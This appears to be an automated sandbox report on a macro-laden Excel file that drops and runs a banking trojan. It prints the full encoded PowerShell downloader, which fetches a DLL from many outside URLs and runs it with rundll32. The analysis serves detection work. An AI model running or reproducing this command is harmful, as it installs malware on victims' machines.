Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE8B7300DD

5_2_000007FE8B7300DD

Source: xxTupY4Fr3.xlsx	OLE, VBA macro line: Private Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module gDFt4etujSDssdf, Function Workbook_Open	Name: Workbook_Open
Source: xxTupY4Fr3.xls.0.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: 13E20000.0.dr	OLE, VBA macro line: Private Sub Workbook_Open()

Source: xxTupY4Fr3.xlsx	OLE indicator, VBA macros: true
Source: xxTupY4Fr3.xls.0.dr	OLE indicator, VBA macros: true
Source: 13E20000.0.dr	OLE indicator, VBA macros: true

Source: ~DF37CAD9B92CF722FF.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF8C88563BA72F0E8.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2345

Source: classification engine

Classification label: mal100.bank.troj.expl.evad.winXLSX@34/24@51/15

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$xxTupY4Fr3.xlsx

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7D78.tmp

Jump to behavior

Source: xxTupY4Fr3.xlsx	OLE indicator, Workbook stream: true
Source: xxTupY4Fr3.xls.0.dr	OLE indicator, Workbook stream: true
Source: 13E20000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs

Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................X%.J.....................7..91.....J..............................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............1.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............d.i.r............%.J..................../............... .......n_.J............8.1.............X%.J............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .c.:.\. ...............................y2..91..d.i.r...........P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................2..91..................P>..............8.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................<.......Z.........................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................2..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>......................I2..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D.......l.......................x.1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .h.j.h.d.r.d.r.e.s.a.s.=.p.o. ..........5..91..S.E.T...........P>..............H.1..... .......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................5..91..................P>..............x.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................<.......~.........................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................Y5..91..e.c.h.o.........P>......................h.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................5..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D.................................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .Y.U.d.e.r.h.d.D.3.=.w.e.r.s. ..........4..91..S.E.T...........P>................1..... .......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>......................)5..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................<...............................X.1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................4..91..e.c.h.o.........P>......................j.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................4..91..................P>..............X.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D.................................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .V.v.d.s.F.H.d.4.=.h.e.l.l. .-.e. .....94..91..S.E.T...........P>................1.....$.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>......................i4..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................<.................................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................7..91..e.c.h.o.........P>......................p.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................4..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D...............................8.1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................y7..91..S.E.T...........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................7..91..................P>..............8.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................D.................................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................7..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>......................I7..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D...............................x.1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................6..91..S.E.T...........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................6..91..................P>..............x.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................D.................................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................Y6..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................6..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........}..w............................D....... .........................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................9..91..S.E.T...........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>......................)6..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........}..w............................D.......2.......................X.1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................9..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................9..91..................P>..............X.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............S.E.T...........P>.......................9..91..................P>..............X.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................9..91..S.E.T...........P>......................>.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................X..J.....................2..91..:i.J............P>..............h.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .V.o.l.u.m.e. .i.n. .d.r.i.v.e. .C. .h.a.s. .n.o. .l.a.b.e.l...........%.........1.....D.......B.........1.....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .V.o.l.u.m.e. .S.e.r.i.a.l. .N.u.m.b.e.r. .i.s. .2.0.A.2.-.D.C.6.8.....).........1.....H.......B.........1.....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................C........1..............12w......1.......1.......................1.....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .D.i.r.e.c.t.o.r.y. .o.f. .c.:.\.................................................1.....*.......B...............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................................................................^.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................................................................................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................................................................h.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................................................................................1.............................	Jump to behavior
